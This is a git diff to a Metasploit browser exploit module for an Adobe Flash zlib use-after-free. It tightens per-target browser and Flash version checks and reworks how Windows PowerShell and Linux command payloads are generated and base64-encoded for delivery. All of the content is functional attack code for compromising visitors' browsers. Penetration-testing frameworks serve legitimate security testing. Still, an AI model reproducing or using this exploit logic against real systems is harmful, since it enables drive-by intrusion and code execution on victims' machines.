diff --git a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb index 3e996bbcbb..774ab5ab27 100644 --- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb +++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb @@ -45,16 +45,31 @@ class Metasploit3 < Msf::Exploit::Remote 'BrowserRequirements' => { :source => /script|headers/i, + :arch => ARCH_X86, :os_name => lambda do |os| os =~ OperatingSystems::Match::LINUX || os =~ OperatingSystems::Match::WINDOWS_7 end, - :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) }, + :ua_name => lambda do |ua| + case target.name + when 'Windows' + return true if ua == Msf::HttpClients::IE + when 'Linux' + return true if ua == Msf::HttpClients::FF + end + + false + end, :flash => lambda do |ver| - (ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.287')) || - (ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.438')) - end, - :arch => ARCH_X86 + case target.name + when 'Windows' + return true if ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.287') + when 'Linux' + return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.438') + end + + false + end }, 'Targets' => [ @@ -97,13 +112,14 @@ class Metasploit3 < Msf::Exploit::Remote def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" - target_payload = get_payload(cli, target_info) if target.name =~ /Windows/ + target_payload = get_payload(cli, target_info) psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) b64_payload = Rex::Text.encode_base64(psh_payload) platform_id = 'win' elsif target.name =~ /Linux/ + target_payload = get_payload(cli, target_info.merge(arch: ARCH_CMD)) b64_payload = Rex::Text.encode_base64(target_payload) platform_id = 'linux' end